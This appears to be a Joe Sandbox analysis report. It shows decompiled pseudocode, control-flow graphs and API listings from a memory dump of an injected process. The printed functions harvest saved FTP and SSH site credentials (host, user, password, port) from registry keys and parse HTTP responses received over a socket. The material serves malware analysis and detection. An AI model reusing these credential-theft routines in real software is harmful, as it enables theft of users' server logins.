                                                                                                                                        0x0bc03997
                                                                                                                                        0x0bc03999
                                                                                                                                        0x0bc039a1
                                                                                                                                        0x0bc03c26
                                                                                                                                        0x0bc03c32
                                                                                                                                        0x0bc03c32
                                                                                                                                        0x0bc039a7
                                                                                                                                        0x0bc039c3
                                                                                                                                        0x0bc039c9
                                                                                                                                        0x0bc039db
                                                                                                                                        0x0bc03c19
                                                                                                                                        0x0bc03c1f
                                                                                                                                        0x0bc03c25
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03c25
                                                                                                                                        0x0bc039e1
                                                                                                                                        0x0bc039e2
                                                                                                                                        0x0bc039f9
                                                                                                                                        0x0bc03a00
                                                                                                                                        0x0bc03a0e
                                                                                                                                        0x0bc03a27
                                                                                                                                        0x0bc03a40
                                                                                                                                        0x0bc03a5c
                                                                                                                                        0x0bc03a62
                                                                                                                                        0x0bc03a67
                                                                                                                                        0x0bc03a6a
                                                                                                                                        0x0bc03a72
                                                                                                                                        0x0bc03a74
                                                                                                                                        0x0bc03a74
                                                                                                                                        0x0bc03a92
                                                                                                                                        0x0bc03a97
                                                                                                                                        0x0bc03a9c
                                                                                                                                        0x0bc03ab8
                                                                                                                                        0x0bc03abd
                                                                                                                                        0x0bc03aa7
                                                                                                                                        0x0bc03aaa
                                                                                                                                        0x0bc03ab0
                                                                                                                                        0x0bc03ab0
                                                                                                                                        0x0bc03ac7
                                                                                                                                        0x0bc03adc
                                                                                                                                        0x0bc03ae1
                                                                                                                                        0x0bc03ae4
                                                                                                                                        0x0bc03af0
                                                                                                                                        0x0bc03b16
                                                                                                                                        0x0bc03b20
                                                                                                                                        0x0bc03b2d
                                                                                                                                        0x0bc03b3a
                                                                                                                                        0x0bc03b47
                                                                                                                                        0x0bc03b52
                                                                                                                                        0x0bc03b5f
                                                                                                                                        0x0bc03b64
                                                                                                                                        0x0bc03b6a
                                                                                                                                        0x0bc03b6f
                                                                                                                                        0x0bc03b8b
                                                                                                                                        0x0bc03b91
                                                                                                                                        0x0bc03b7a
                                                                                                                                        0x0bc03b7c
                                                                                                                                        0x0bc03b7c
                                                                                                                                        0x0bc03b6f
                                                                                                                                        0x0bc03b9d
                                                                                                                                        0x0bc03ba8
                                                                                                                                        0x0bc03bb3
                                                                                                                                        0x0bc03bbe
                                                                                                                                        0x0bc03bc9
                                                                                                                                        0x0bc03bd4
                                                                                                                                        0x0bc03bd9
                                                                                                                                        0x0bc03bdc
                                                                                                                                        0x0bc03bfa
                                                                                                                                        0x0bc03c10
                                                                                                                                        0x0bc03c18
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,Software\FTPWare\COREFTP\Sites,?), ref: 0BC03999
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC039D3
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0BC03C1F
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                          • Part of subcall function 0BC08DDA: RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,HWID,?,HWID,?,?), ref: 0BC08E1A
                                                                                                                                          • Part of subcall function 0BC08DDA: RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000), ref: 0BC08E3B
                                                                                                                                          • Part of subcall function 0BC08DDA: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?), ref: 0BC08E69
                                                                                                                                          • Part of subcall function 0BC08DDA: RegCloseKey.KERNELBASE(?), ref: 0BC08E8C
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000), ref: 0BC03C0A
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CloseEnumOpenQueryValuelstrcatlstrcpy$FreeLocal
                                                                                                                                        • String ID: Host$Port$PthR$SSH$Software\FTPWare\COREFTP\Sites$User
                                                                                                                                        • API String ID: 1412871966-1877655602
                                                                                                                                        • Opcode ID: 59b5290f55eafa3f733aa709a44687cf0adcf6fc89edb3bdf58fca88d61d59fb
                                                                                                                                        • Instruction ID: a24a6e1eb660b2f24410d44909a583ce8941715fac0fab7c52f4ec5d9ef98081
                                                                                                                                        • Opcode Fuzzy Hash: 59b5290f55eafa3f733aa709a44687cf0adcf6fc89edb3bdf58fca88d61d59fb
                                                                                                                                        • Instruction Fuzzy Hash: 62617FB0A31228AECF21AB54CC45ADA7AFDFF45640F00C5E5E589A1190DE718F81EFE0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Function 0BC018F2, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 233networkmemoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 524 bc018f2-bc01939 LocalAlloc CreateStreamOnHGlobal 525 bc0193f-bc01957 call bc01885 524->525 528 bc01b12-bc01b1b call bc01885 525->528 529 bc0195d-bc0195f 525->529 532 bc01b1d-bc01b34 call bc08d3d 528->532 535 bc01ac0-bc01ad3 recv 528->535 531 bc01965-bc01975 call bc089a1 529->531 529->532 531->532 538 bc0197b-bc01981 531->538 545 bc01b35 532->545 535->532 540 bc01ad5-bc01adc 535->540 541 bc01983-bc019b6 538->541 543 bc01ae8-bc01b04 call bc089a1 540->543 544 bc01ade 540->544 554 bc01b51 541->554 555 bc019bc-bc019c2 541->555 556 bc01b46 543->556 557 bc01b06-bc01b0c 543->557 544->543 547 bc01b37-bc01b45 call bc09fdc 545->547 560 bc01b59-bc01b64 554->560 555->541 558 bc019c4-bc019c8 555->558 556->554 557->528 557->531 558->525 559 bc019ce-bc01a13 StrStrIA 558->559 573 bc01a15-bc01a18 559->573 574 bc01a3d-bc01a50 StrStrIA 559->574 561 bc01b66 560->561 562 bc01b6c-bc01b82 recv 560->562 561->562 564 bc01b84 562->564 565 bc01baa-bc01bb7 call bc089a1 562->565 564->565 567 bc01b86-bc01b95 564->567 571 bc01bd8-bc01bec 565->571 572 bc01bb9-bc01bcb call bc08d3d 565->572 575 bc01b9b 567->575 571->545 586 bc01bf2-bc01bf5 571->586 595 bc01bd0-bc01bd3 572->595 578 bc01a1a-bc01a1e 573->578 576 bc01a81-bc01a92 call bc08b39 574->576 577 bc01a52 574->577 575->565 579 bc01b9d-bc01ba0 call bc01885 575->579 596 bc01a94 576->596 597 bc01a9e-bc01ab3 call bc01885 576->597 580 bc01a54-bc01a58 577->580 584 bc01a20-bc01a27 578->584 585 bc01a29-bc01a39 StrToIntA 578->585 592 bc01ba5-bc01ba8 579->592 588 bc01a62-bc01a6d 580->588 589 bc01a5a-bc01a60 580->589 584->578 584->585 585->574 586->572 593 bc01a7e 588->593 594 bc01a6f-bc01a7c call bc091e5 588->594 589->580 589->588 592->560 592->565 593->576 594->593 595->547 596->597 600 bc01ab8-bc01abb 597->600 600->575
                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                        			E0BC018F2(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v12;
				char _v2064;
				void* _v2068;
				void* _v2072;
				char _v2073;
				void* _v2080;
				char _v2084;
				intOrPtr* _v2088;
				intOrPtr _v2092;
				char _v2096;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t71;
				char _t77;
				char _t78;
				char* _t79;
				intOrPtr* _t80;
				char _t83;
				void* _t88;
				void* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t104;
				intOrPtr* _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				void* _t112;
				char _t113;
				char* _t114;
				void* _t117;
				char _t120;
				intOrPtr* _t140;
				void* _t141;
				char* _t142;
				void* _t143;
				intOrPtr* _t145;
				char* _t146;
				signed int _t147;
				void* _t167;

				_t71 =  *0xbc10000; // 0xbb40e64e
				_v12 = _t71 ^ _t147;
				_v2092 = _a8;
				_v2088 = _a12;
				_v2080 = LocalAlloc(0x40, 0x7d80);
				_t120 = 0;
				__imp__CreateStreamOnHGlobal(0, 1,  &_v2072);
				do {
					_t140 = _a4;
					_t144 = _v2072;
					_v2068 = _t120;
					_t77 = E0BC01885(_t140); // executed
					_pop(_t122);
					if(_t77 != 0) {
						while(1) {
							_t78 = E0BC01885(_t140); // executed
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							_t79 =  &_v2073;
							__imp__#16(_t140, _t79, 1, _t120); // executed
							__eflags = _t79;
							if(_t79 < 0) {
								break;
							}
							__eflags = _v2073 - 0xa;
							if(_v2073 == 0xa) {
								_v2068 = 1;
							}
							_t122 =  &_v2073;
							 *((intOrPtr*)( *_t144 + 0x10))(_t144,  &_v2073, 1, _t120);
							_t88 = E0BC089A1(_t144,  &_v2073);
							__eflags = _t88 - 0xfa00;
							if(_t88 >= 0xfa00) {
								_t77 = _v2068;
								goto L2;
							} else {
								__eflags = _v2068 - _t120;
								if(_v2068 != _t120) {
									L3:
									if(E0BC089A1(_v2072, _t122) > 0xfa00) {
										break;
									}
									_t145 = _v2072;
									_t141 = 0;
									while(1) {
										 *((intOrPtr*)( *_t145 + 0x14))(_t145, _t141, 0, _t120, _t120);
										_v2084 = _t120;
										 *((intOrPtr*)( *_t145 + 0xc))(_t145,  &_v2084, 4,  &_v2096);
										_t141 = _t141 + 1;
										if(_v2084 == 0xa0d0a0d) {
											break;
										}
										if(_v2096 != _t120) {
											continue;
										}
										_t95 = 0;
										goto L8;
									}
									_t54 = _t141 + 3; // 0x4
									_t95 = _t54;
									goto L8;
								}
								continue;
							}
						}
						L30:
						_t80 = _v2072;
						 *((intOrPtr*)( *_t80 + 8))(_t80);
						E0BC08D3D(_v2080);
						L31:
						_t83 = 0;
						__eflags = 0;
						L32:
						return E0BC09FDC(_t83, _t120, _v12 ^ _t147, _t139, _t140, _t144);
					}
					L2:
					if(_t77 == _t120) {
						goto L30;
					}
					goto L3;
					L8:
				} while (_t95 == _t120);
				_t96 = _v2072;
				_t139 =  *_t96;
				 *((intOrPtr*)( *_t96 + 0x14))(_t96, 0, _t120, _t120, _t120);
				_t98 = _v2072;
				 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v2080, 0x2134, _t120);
				_v2068 = _t120;
				_t146 = StrStrIA(_v2080, "Content-Length:");
				if(_t146 == _t120) {
					L14:
					if(StrStrIA(_v2080, "Location:") == 0) {
						L21:
						_t144 = _v2072;
						E0BC08B39(_v2072);
						if(_v2068 <= _t120) {
							_v2068 = 0xa00000;
						}
						_t140 = _v2072;
						_t104 = E0BC01885(_a4); // executed
						_pop(_t133);
						_t167 = _t104;
						while(_t167 != 0) {
							_t112 = E0BC01885(_a4); // executed
							_pop(_t133);
							if(_t112 != 0) {
								_t113 = 0x800;
								__eflags = _v2068 - 0x800;
								if(_v2068 <= 0x800) {
									_t113 = _v2068;
								}
								_t114 =  &_v2064;
								__imp__#16(_a4, _t114, _t113, _t120); // executed
								_t144 = _t114;
								__eflags = _t144 - _t120;
								if(__eflags < 0 || __eflags == 0) {
									break;
								} else {
									_t133 =  &_v2064;
									 *((intOrPtr*)( *_t140 + 0x10))(_t140,  &_v2064, _t144, _t120);
									_t61 =  &_v2068;
									 *_t61 = _v2068 - _t144;
									__eflags =  *_t61;
									continue;
								}
							}
							break;
						}
						if(E0BC089A1(_v2072, _t133) != 0) {
							_t107 = _v2072;
							_t108 =  *((intOrPtr*)( *_t107 + 0x34))(_t107, _v2092);
							__eflags = _t108;
							if(_t108 < 0) {
								goto L31;
							}
							_t120 = 1;
						}
						_t109 = _v2072;
						 *((intOrPtr*)( *_t109 + 8))(_t109);
						E0BC08D3D(_v2080); // executed
						_t83 = _t120;
						goto L32;
					}
					_t117 = 0;
					while( *((char*)(_t117 + _t146)) != 0xd) {
						_t117 = _t117 + 1;
						if(_t117 < 0x1194) {
							continue;
						}
						break;
					}
					_t142 = _t117 + _t146;
					 *_t142 = _t120;
					if(_v2088 != _t120) {
						 *_v2088 = E0BC091E5(_t146);
					}
					 *_t142 = 0xd;
					goto L21;
				}
				_t146 =  &(_t146[0x10]);
				_t143 = 0;
				while( *((char*)(_t143 + _t146)) != 0xd) {
					_t143 = _t143 + 1;
					if(_t143 < 0x1194) {
						continue;
					}
					break;
				}
				 *((char*)(_t143 + _t146)) = _t120;
				_v2068 = StrToIntA(_t146);
				 *((char*)(_t143 + _t146)) = 0xd;
				goto L14;
			}











































                                                                                                                                        0x0bc018fb
                                                                                                                                        0x0bc01902
                                                                                                                                        0x0bc0190b
                                                                                                                                        0x0bc0191b
                                                                                                                                        0x0bc01927
                                                                                                                                        0x0bc01936
                                                                                                                                        0x0bc01939
                                                                                                                                        0x0bc0193f
                                                                                                                                        0x0bc0193f
                                                                                                                                        0x0bc01942
                                                                                                                                        0x0bc01949
                                                                                                                                        0x0bc0194f
                                                                                                                                        0x0bc01954
                                                                                                                                        0x0bc01957
                                                                                                                                        0x0bc01b12
                                                                                                                                        0x0bc01b13
                                                                                                                                        0x0bc01b19
                                                                                                                                        0x0bc01b1b
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01ac3
                                                                                                                                        0x0bc01acb
                                                                                                                                        0x0bc01ad1
                                                                                                                                        0x0bc01ad3
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01ad5
                                                                                                                                        0x0bc01adc
                                                                                                                                        0x0bc01ade
                                                                                                                                        0x0bc01ade
                                                                                                                                        0x0bc01aed
                                                                                                                                        0x0bc01af5
                                                                                                                                        0x0bc01afa
                                                                                                                                        0x0bc01aff
                                                                                                                                        0x0bc01b04
                                                                                                                                        0x0bc01b46
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01b06
                                                                                                                                        0x0bc01b06
                                                                                                                                        0x0bc01b0c
                                                                                                                                        0x0bc01965
                                                                                                                                        0x0bc01975
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0197b
                                                                                                                                        0x0bc01981
                                                                                                                                        0x0bc01983
                                                                                                                                        0x0bc0198c
                                                                                                                                        0x0bc019a2
                                                                                                                                        0x0bc019a8
                                                                                                                                        0x0bc019ab
                                                                                                                                        0x0bc019b6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc019c2
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc019c4
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc019c4
                                                                                                                                        0x0bc01b51
                                                                                                                                        0x0bc01b51
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01b51
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01b0c
                                                                                                                                        0x0bc01b04
                                                                                                                                        0x0bc01b1d
                                                                                                                                        0x0bc01b1d
                                                                                                                                        0x0bc01b26
                                                                                                                                        0x0bc01b2f
                                                                                                                                        0x0bc01b35
                                                                                                                                        0x0bc01b35
                                                                                                                                        0x0bc01b35
                                                                                                                                        0x0bc01b37
                                                                                                                                        0x0bc01b45
                                                                                                                                        0x0bc01b45
                                                                                                                                        0x0bc0195d
                                                                                                                                        0x0bc0195f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc019c6
                                                                                                                                        0x0bc019c6
                                                                                                                                        0x0bc019ce
                                                                                                                                        0x0bc019d4
                                                                                                                                        0x0bc019dd
                                                                                                                                        0x0bc019e0
                                                                                                                                        0x0bc019f5
                                                                                                                                        0x0bc01a03
                                                                                                                                        0x0bc01a0f
                                                                                                                                        0x0bc01a13
                                                                                                                                        0x0bc01a3d
                                                                                                                                        0x0bc01a50
                                                                                                                                        0x0bc01a81
                                                                                                                                        0x0bc01a81
                                                                                                                                        0x0bc01a87
                                                                                                                                        0x0bc01a92
                                                                                                                                        0x0bc01a94
                                                                                                                                        0x0bc01a94
                                                                                                                                        0x0bc01aa7
                                                                                                                                        0x0bc01ab3
                                                                                                                                        0x0bc01ab8
                                                                                                                                        0x0bc01ab9
                                                                                                                                        0x0bc01b9b
                                                                                                                                        0x0bc01ba0
                                                                                                                                        0x0bc01ba5
                                                                                                                                        0x0bc01ba8
                                                                                                                                        0x0bc01b59
                                                                                                                                        0x0bc01b5e
                                                                                                                                        0x0bc01b64
                                                                                                                                        0x0bc01b66
                                                                                                                                        0x0bc01b66
                                                                                                                                        0x0bc01b6e
                                                                                                                                        0x0bc01b78
                                                                                                                                        0x0bc01b7e
                                                                                                                                        0x0bc01b80
                                                                                                                                        0x0bc01b82
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01b86
                                                                                                                                        0x0bc01b8a
                                                                                                                                        0x0bc01b92
                                                                                                                                        0x0bc01b95
                                                                                                                                        0x0bc01b95
                                                                                                                                        0x0bc01b95
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01b95
                                                                                                                                        0x0bc01b82
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01ba8
                                                                                                                                        0x0bc01bb7
                                                                                                                                        0x0bc01bd8
                                                                                                                                        0x0bc01be7
                                                                                                                                        0x0bc01bea
                                                                                                                                        0x0bc01bec
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01bf4
                                                                                                                                        0x0bc01bf4
                                                                                                                                        0x0bc01bb9
                                                                                                                                        0x0bc01bc2
                                                                                                                                        0x0bc01bcb
                                                                                                                                        0x0bc01bd1
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01bd1
                                                                                                                                        0x0bc01a52
                                                                                                                                        0x0bc01a54
                                                                                                                                        0x0bc01a5a
                                                                                                                                        0x0bc01a60
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01a60
                                                                                                                                        0x0bc01a62
                                                                                                                                        0x0bc01a65
                                                                                                                                        0x0bc01a6d
                                                                                                                                        0x0bc01a7c
                                                                                                                                        0x0bc01a7c
                                                                                                                                        0x0bc01a7e
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01a7e
                                                                                                                                        0x0bc01a15
                                                                                                                                        0x0bc01a18
                                                                                                                                        0x0bc01a1a
                                                                                                                                        0x0bc01a20
                                                                                                                                        0x0bc01a27
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01a27
                                                                                                                                        0x0bc01a2a
                                                                                                                                        0x0bc01a33
                                                                                                                                        0x0bc01a39
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00007D80,00000000,00000000,00000000), ref: 0BC01921
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0BC01939
                                                                                                                                          • Part of subcall function 0BC01885: select.WS2_32(00000000,?,00000000,00000000,?), ref: 0BC018D0
                                                                                                                                        • StrStrIA.SHLWAPI(?,Content-Length:), ref: 0BC01A09
                                                                                                                                        • StrToIntA.SHLWAPI(-00000010), ref: 0BC01A2D
                                                                                                                                        • StrStrIA.SHLWAPI(?,Location:), ref: 0BC01A48
                                                                                                                                        • recv.WS2_32(00000000,?,00000001,00000000), ref: 0BC01ACB
                                                                                                                                        • recv.WS2_32(00000000,?,00000800,00000000), ref: 0BC01B78
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: recv$AllocCreateGlobalLocalStreamselect
                                                                                                                                        • String ID: Content-Length:$Location:
                                                                                                                                        • API String ID: 2711603718-2400408565
                                                                                                                                        • Opcode ID: c5e3c96dd09edf784c9f246261aa46f8be94373a983e330611ac675507075b20
                                                                                                                                        • Instruction ID: 8afb9989686e166e127df99691713af7404f3755cc9b947933963004c0a99eff
                                                                                                                                        • Opcode Fuzzy Hash: c5e3c96dd09edf784c9f246261aa46f8be94373a983e330611ac675507075b20
                                                                                                                                        • Instruction Fuzzy Hash: BE914D71A20119AFDB249F64CC44BAAB7F8FF04704F0885E9F559A7180DF709E828FA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.25%

                                                                                                                                        Function 0BC0460A, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 180registryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 55%
                                                                                                                                        			E0BC0460A(void* __edx, intOrPtr _a4, void* _a8, char* _a12) {
				signed int _v8;
				char _v2056;
				intOrPtr _v2060;
				intOrPtr _v2064;
				void* _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				char* _v2080;
				char _v2084;
				intOrPtr _v2088;
				char _v2092;
				char _v2096;
				void* _v2100;
				intOrPtr _v2104;
				char _v2108;
				char _v2112;
				char* _v2116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t64;
				char* _t66;
				long _t67;
				intOrPtr* _t86;
				char* _t89;
				void* _t116;
				void* _t123;
				intOrPtr _t124;
				void* _t125;
				signed int _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t123 = __edx;
				_t64 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t64 ^ _t127;
				_t66 = _a12;
				_t116 = _a8;
				_t124 = _a4;
				_t119 =  &_v2068;
				_v2100 = _t116;
				_v2116 = _t66;
				_t67 = RegOpenKeyA(_t116, _t66,  &_v2068); // executed
				if(_t67 == 0) {
					_push(_t125);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v2092);
					_push( &_v2056);
					_v2084 = 0;
					_push(0);
					while(1) {
						_v2092 = 0x7ff;
						if(RegEnumKeyExA(_v2068, ??, ??, ??, ??, ??, ??, ??) != 0) {
							break;
						}
						_v2064 = E0BC08EE2("\\", _v2116);
						_v2060 = E0BC08EE2( &_v2056, _t73);
						E0BC08D3D(_v2064);
						_v2072 = E0BC08EBD(_t116, _v2060, "Password", 0);
						_v2088 = E0BC08EBD(_t116, _v2060, "HostName", 0);
						_v2076 = E0BC08EBD(_t116, _v2060, "UserName", 0);
						_v2064 = E0BC08EBD(_t116, _v2060, "RemoteDirectory", 0);
						_t86 = E0BC08DDA(0,  *0xbc10010, _v2060, "PortNumber",  &_v2112, 0);
						_t129 = _t128 + 0x50;
						if(_t86 == 0) {
							L6:
							_v2104 = 0x15;
						} else {
							_push(_t86);
							if(_v2112 != 4) {
								E0BC08D3D();
								_pop(_t119);
								goto L6;
							} else {
								_v2104 =  *_t86;
								E0BC08D3D();
								_pop(_t119);
							}
						}
						_t89 = E0BC08EBD(_t116, _v2060, "FSProtocol",  &_v2108);
						_t130 = _t129 + 0xc;
						_v2080 = _t89;
						if(_t89 == 0) {
							_v2080 = " ";
						}
						if(_v2072 != 0 && _v2088 != 0 && _v2076 != 0) {
							_v2096 = 0xbeef0010;
							E0BC08A41( &_v2096, _t119, _t124, 4);
							E0BC08C6D(_t124, _t119, _v2088);
							E0BC08C6D(_t124, _t119, _v2076);
							E0BC08C6D(_t124, _t119, _v2072);
							E0BC08C37(_v2104);
							E0BC08C6D(_t124, _t119, _v2064);
							_t110 = _v2080;
							_t130 = _t130 + 0x14;
							if(_v2080 == 0 || _v2108 != 4) {
								_v2096 = 0;
								E0BC08A41( &_v2096, _t119, _t124, 4);
								_pop(_t119);
							} else {
								E0BC08C37( *_t110);
							}
							_t116 = _v2100;
						}
						E0BC08D3D(_v2072);
						E0BC08D3D(_v2088);
						E0BC08D3D(_v2076);
						E0BC08D3D(_v2064);
						E0BC08D3D(_v2080);
						E0BC0460A(_t123, _t124, _t116, _v2060);
						E0BC08D3D(_v2060);
						_t128 = _t130 + 0x24;
						_v2084 = _v2084 + 1;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v2092);
						_push( &_v2056);
						_push(_v2084);
					}
					_t67 = RegCloseKey(_v2068);
					_pop(_t125);
				}
				return E0BC09FDC(_t67, _t116, _v8 ^ _t127, _t123, _t124, _t125);
			}




































                                                                                                                                        0x0bc0460a
                                                                                                                                        0x0bc04613
                                                                                                                                        0x0bc0461a
                                                                                                                                        0x0bc0461d
                                                                                                                                        0x0bc04621
                                                                                                                                        0x0bc04625
                                                                                                                                        0x0bc04628
                                                                                                                                        0x0bc04631
                                                                                                                                        0x0bc04637
                                                                                                                                        0x0bc0463d
                                                                                                                                        0x0bc04645
                                                                                                                                        0x0bc0464b
                                                                                                                                        0x0bc0464e
                                                                                                                                        0x0bc0464f
                                                                                                                                        0x0bc04650
                                                                                                                                        0x0bc04651
                                                                                                                                        0x0bc04658
                                                                                                                                        0x0bc0465f
                                                                                                                                        0x0bc04660
                                                                                                                                        0x0bc04666
                                                                                                                                        0x0bc048a5
                                                                                                                                        0x0bc048ab
                                                                                                                                        0x0bc048bd
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0467c
                                                                                                                                        0x0bc04694
                                                                                                                                        0x0bc0469a
                                                                                                                                        0x0bc046be
                                                                                                                                        0x0bc046d7
                                                                                                                                        0x0bc046f0
                                                                                                                                        0x0bc046fe
                                                                                                                                        0x0bc0471c
                                                                                                                                        0x0bc04721
                                                                                                                                        0x0bc04726
                                                                                                                                        0x0bc04748
                                                                                                                                        0x0bc04748
                                                                                                                                        0x0bc04728
                                                                                                                                        0x0bc0472f
                                                                                                                                        0x0bc04730
                                                                                                                                        0x0bc04742
                                                                                                                                        0x0bc04747
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc04732
                                                                                                                                        0x0bc04734
                                                                                                                                        0x0bc0473a
                                                                                                                                        0x0bc0473f
                                                                                                                                        0x0bc0473f
                                                                                                                                        0x0bc04730
                                                                                                                                        0x0bc04766
                                                                                                                                        0x0bc0476b
                                                                                                                                        0x0bc0476e
                                                                                                                                        0x0bc04776
                                                                                                                                        0x0bc04778
                                                                                                                                        0x0bc04778
                                                                                                                                        0x0bc04788
                                                                                                                                        0x0bc047ae
                                                                                                                                        0x0bc047b8
                                                                                                                                        0x0bc047c5
                                                                                                                                        0x0bc047d2
                                                                                                                                        0x0bc047df
                                                                                                                                        0x0bc047ea
                                                                                                                                        0x0bc047f7
                                                                                                                                        0x0bc047fc
                                                                                                                                        0x0bc04802
                                                                                                                                        0x0bc04807
                                                                                                                                        0x0bc04823
                                                                                                                                        0x0bc04829
                                                                                                                                        0x0bc0482e
                                                                                                                                        0x0bc04812
                                                                                                                                        0x0bc04814
                                                                                                                                        0x0bc04814
                                                                                                                                        0x0bc0482f
                                                                                                                                        0x0bc0482f
                                                                                                                                        0x0bc0483b
                                                                                                                                        0x0bc04846
                                                                                                                                        0x0bc04851
                                                                                                                                        0x0bc0485c
                                                                                                                                        0x0bc04867
                                                                                                                                        0x0bc04874
                                                                                                                                        0x0bc0487f
                                                                                                                                        0x0bc04884
                                                                                                                                        0x0bc04887
                                                                                                                                        0x0bc0488d
                                                                                                                                        0x0bc0488e
                                                                                                                                        0x0bc0488f
                                                                                                                                        0x0bc04890
                                                                                                                                        0x0bc04897
                                                                                                                                        0x0bc0489e
                                                                                                                                        0x0bc0489f
                                                                                                                                        0x0bc0489f
                                                                                                                                        0x0bc048c9
                                                                                                                                        0x0bc048cf
                                                                                                                                        0x0bc048cf
                                                                                                                                        0x0bc048dd

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0BC0463D
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC048B5
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0BC048C9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
